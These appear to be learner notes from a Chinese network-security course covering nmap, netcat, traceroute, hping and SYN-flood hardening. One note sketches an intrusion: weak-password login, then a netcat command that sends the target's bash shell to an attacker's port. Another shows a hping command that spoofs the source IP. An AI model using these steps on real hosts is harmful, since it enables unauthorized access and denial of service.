-
fping參數
查看全部 -
源碼包編譯過程查看全部
-
主機掃描命令
查看全部 -
網絡安全技術手段查看全部
-
網絡安全技術定義
查看全部 -
1.網絡入侵方式
踩點,網絡掃描,查點,提權等查看全部 -
tracert命令tracert www.jd.com 查ip地址
nmap命批量主機服務掃描令,得知某個路由里面的端口
嘗試進行暴力破解,發現登陸內網http://10.202.4.73,是否能用弱口令進行登陸,例如:admin/admin
登陸到管理界面后,嘗試用nc命令進行交互式shell操作,例如nc -10.68.104.6? 2005 -e/bin/bash監聽黑客的2005接口,并將目標機器的所有bash命令
查看全部 -
SYN類型DDOS攻擊:服務器接收到連接請求(syn=j),將此信息加入backlog未連接隊列,導致隊列滿了丟棄掉正常的SYN請求,同時發送請求包給客戶(syn=k,ack=j+1),進入SYN_RECV狀態。當未收到客戶端的確認包時,一直重發請求包,占用網絡帶寬,引起網絡堵塞甚至系統癱瘓。
減少syn和ack包的重試次數
????sysctl -w net.ipv4.tcp_synack_retries=3
????sysctl -w net.ipv4.tcp_syn_retries=3
SYN cookies技術
????sysctl -w net.ipv4.tcp_syncookies=1
增加backlog隊列
?????sysctl -w net.ipv4.tcp_max_syn_backlog=2048
關閉ICMP協議請求
?????sysctl -w net.ipv4.icmp_echo_ignore_all=1
查看全部 -
netcat(nc)工具:在centos中通過yum search nc查找,然后安裝。 nc -z -v -n -w2 172.31.100.7 21-25 可以運行在TCP或者UDP模式,默認是TCP,-u參數調整為UDP。 z 參數在連接成功后立即關閉連接,不進行數據交換;v 參數指詳細輸出;n 參數表示不要使用DNS反向查詢IP地址的域名。 這個命令會打印21到25所有開放的端口并且打印運行在這個端口上服務的banner信息。Banner是一個文本,是一個你連接的服務發送給你的文本信息。但是,并不是所有的服務都會發送banner。
查看全部 -
1、nmap -sP IP/24 查看這一段IP內哪個主機的開放的 ICMP協議類型 ping掃描 2、nmap -sS [-p 端口范圍] IP 查看IP開發的TCP端口 TCP SYN掃描 tcp半開放掃描(沒有建立三次握手)(不會被服務檢測,例如Apache等) 默認掃描0-1024端口及一些常用端口 3、nmap -sT [-p 端口范圍] IP TCP connect()掃描 TCP全開放掃描 4、nmap -sU IP UDP掃描 UDP協議掃描 有效透過防火墻策略
查看全部 -
nmap -sP(ping掃描主機是否存活) x.x.x.0/24? ? <nmap -sP?61.135.169.0/24>
nmap -sS(TCP半開放掃描) -p(指定端口掃描范圍) [端口1]-[端口2] [目標IP]????<nmap -sS -p 0-30000 192.168.5.7>
nmap -sT(TCP全開放掃描)?-p(指定端口掃描范圍) [端口1]-[端口2] [目標IP]????<nmap -sT -p 0-30000 192.168.5.7>
nmap -sU(UDP掃描)?-p(指定端口掃描范圍) [端口1]-[端口2] [目標IP]????<nmap -sU -p 0-30000 192.168.5.7>
tcp半開放掃描:發送SYN包但不建立第三次握手,不被目標服務發現 tcp全開放掃描:進行三次握手,建立tcp連接
查看全部 -
原理與traceroute一致,mtr另外可以看丟包率
查看全部 -
路由掃描:查詢本機到另一個主機經過的路由跳數及數據延遲情況。 tracerpute原理:traceroute 送出一個TTL(生存時間)是1的UDP數據包(每次送的的是3個40字節的包,包括源地址,目的地址和包發出的時間標簽)到目的地,當路徑上的第一個路由器收到這個數據包時,它將TTL減1變為0,并送回一個ICMP數據包,表示UDP數據包已經執行;接著再送出另一個TTL為2的數據包,發現第二個路由器,然后一直重復執行該操作,直到某個數據包抵達目的地;因為它所選擇送達的port number(30000以上)是一般應用程序都不會用的端口,所以在traceroute送出UDP數據包到目的地時,該目的主機會送回一個目的地址不可達的消息
查看全部 -
hping 一 對制定端口發起TCP探測 ?二 偽造來源IP,模擬Ddos攻擊
Linux查看端口????netstat -l(監聽)t(TCP)n(不顯示主機名)? ? <netstat -ltn>
Windows查看端口????netstat -ano
hping -p [端口] -S(發送SYN包) [目標IP]?
-a(偽造發送IP) [偽造IP] ? ?<hping -p 22 -S 192.168.3.26 -a 192.168.3.27>
修改Linux內核禁用ICMP報文????sysctl -w net.ipv4.icmp_echo_ignore_all=1
查看經過某網絡設備包信息 ? ?tcpdump -n(不把主機IP轉換為名稱) -p(不讓網絡界面進入混雜模式) -i[網卡名稱] src host(只顯示此IP包信息) [目標IP] ? <tcpdump -np -ieth1 src host 192.168.3.56>?
查看全部 -
hping安裝依賴了libpcap和libpcap-devel。 make出現錯誤:net/bpf.h:沒有那個文件或目錄,未發現bpf-h,解決辦法:ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h;/usr/bin/ld:cannot find -ltcl,解決辦法:yum install tcl-devel;創建符號鏈接 "/usr/sbin/hping"文件已存在,解決辦法:使用 rm -rf ?/usr/sbin/hping* 刪除。 make install之后,出現Can't install the man page: /usr/local/man/man8 does not exis
查看全部
舉報